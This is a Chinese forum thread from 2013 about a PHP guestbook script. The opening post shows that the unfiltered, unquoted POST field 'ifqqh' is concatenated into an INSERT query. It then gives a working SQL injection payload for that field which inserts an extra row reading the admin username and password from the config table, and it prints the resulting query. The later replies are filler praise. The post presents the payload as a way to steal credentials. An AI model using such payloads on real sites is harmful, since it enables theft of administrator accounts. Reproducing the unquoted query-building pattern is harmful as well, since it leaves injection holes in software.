查看: 2530|回复: 25

php留言本注入得帐号密码

[复制链接]
发表于 2013-2-18 18:51:19 | 显示全部楼层 |阅读模式

留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。

$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响

提交的时候把ifqqh的值改一下。变成

<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />

这样SQL插入语句就变了.

insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)

构造了另外一句SQL。并且把帐号密码读出来。


发表于 2013-2-22 12:10:35 | 显示全部楼层
不要等到人人都说你丑时才发现自己真的丑。  
发表于 2013-3-1 11:14:40 | 显示全部楼层
做一个,做好了,请看  
发表于 2013-3-4 01:46:53 | 显示全部楼层
强人,佩服死了。呵呵,不错啊  
发表于 2013-3-4 08:27:05 | 显示全部楼层
顶的就是你  
发表于 2014-11-17 07:44:30 | 显示全部楼层
加油啊!偶一定会追随你左右,偶坚定此贴必然会起到抛砖引玉的作用~  
发表于 2014-12-4 19:03:55 | 显示全部楼层
(*^__^*) 嘻嘻……   
发表于 2014-12-27 20:41:23 | 显示全部楼层
感觉好像在哪里看过了,汗~  
发表于 2015-1-27 19:04:39 | 显示全部楼层
没人理我。。。。  
发表于 2015-3-1 18:22:22 | 显示全部楼层
我帮你 喝喝  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则